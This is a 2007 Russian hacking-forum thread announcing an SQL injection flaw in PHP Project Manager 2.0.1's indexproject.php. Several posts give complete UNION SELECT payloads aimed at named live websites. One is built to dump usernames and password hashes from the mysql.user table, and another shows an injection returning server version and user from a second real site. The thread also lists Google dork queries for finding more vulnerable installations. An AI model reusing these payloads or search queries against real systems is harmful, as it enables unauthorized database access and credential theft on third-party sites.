PDA

Просмотр полной версии : sql inj PHP Project Manager => 2.0.1

BlackCats
23.03.2007, 13:09
изначально уязвимость предполагалось для того чтобы меня взяли в моа, но т.к. меня послали - я её выкладываю.

PHP Project Manager
версия => 2.0.1
описание:
Уязвимость существует в сценарии indexproject.php из-за недостаточной обработки входных данных.
пример:
http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35/*

на секлабе баги нету(ну и вроде в др местах тоже)
Spyder
23.03.2007, 13:25
хэк=)
Colkru
23.03.2007, 22:08
Молодец, правда скрипт не популярен, не думаю что в МОА было бы комуто интересно...
:)
Rebz
23.03.2007, 22:16
и это все??? нда, коварно..
я думал ты хоть подобрал названия таблиц..
BlackCats
23.03.2007, 22:21
и это все??? нда, коварно..
я думал ты хоть подобрал названия таблиц..

зачем? я же просто привёл пример.. и только-то..
n1†R0x
23.03.2007, 22:23
мде =\
http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,concat(user,0x3a,password),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql.us er/*
это в sqlz можно..
:)
BlackCats
25.03.2007, 11:15
мде =\
http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,concat(user,0x3a,password),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql.us er/*
это в sqlz можно..
:)

понимаеш в чём разница.. когда скуля на самописном сайте - это одно, а когда в движке, это другое.
n1†R0x
25.03.2007, 11:20
понимаеш в чём разница.. когда скуля на самописном сайте - это одно, а когда в движке, это другое.
порой самописные сайты бывают лучше защищены, чем средние Cms.
я понял твою мысль..
BlackCats
25.03.2007, 12:34
ну вот и хорошо :)
следующий..
-=lebed=-
25.03.2007, 12:47
следующий..
я ;)

Строка для поиска в гугл: inurl:indexproject.php?id

Мдя, не густо:

http://www.google.ru/search?hl=ru&q=inurl%3Aindexproject.php%3Fid&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=

и так тоже:

http://www.google.ru/search?hl=ru&newwindow=1&q=%22PHP+Project+Manager+2.0.1%22&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=

Ну да, скуль есть:

http://www.nuevoparadigma.com/proyectos/indexproject.php?id=-1+union+select+1,version(),3,4,user(),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35/*

PHP Project Manager 2.0.1 © 2004 - www.jomier.com
тока двиг не популярный...
BlackCats
25.03.2007, 12:57
:)))))))))
*с надеждой в голосе*
ну может это только пока... а потом скрипт станет мега популярным...
Rebz
25.03.2007, 13:14
тема переростает во флейм и она себя исчерпала.
guest3297
25.03.2007, 13:53
ммм если ты даешь пример sql то для этого есть тема, если ты даешь уязвимость в движке ты пишешь как и при каких условиях поднять права.
BlackCats
25.03.2007, 18:43
']ммм если ты даешь пример sql то для этого есть тема, если ты даешь уязвимость в движке ты пишешь как и при каких условиях поднять права.
нет, причём тут поднятие прав? на секлабе вродебы ничего про это нет...
Rebz
25.03.2007, 20:11
\6/, для тебя секлаб - самая высшая инстанция и авторитет??? Тогда мне тебя жаль..
BlackCats
25.03.2007, 21:25
ну я больше незна столь популярных багтреков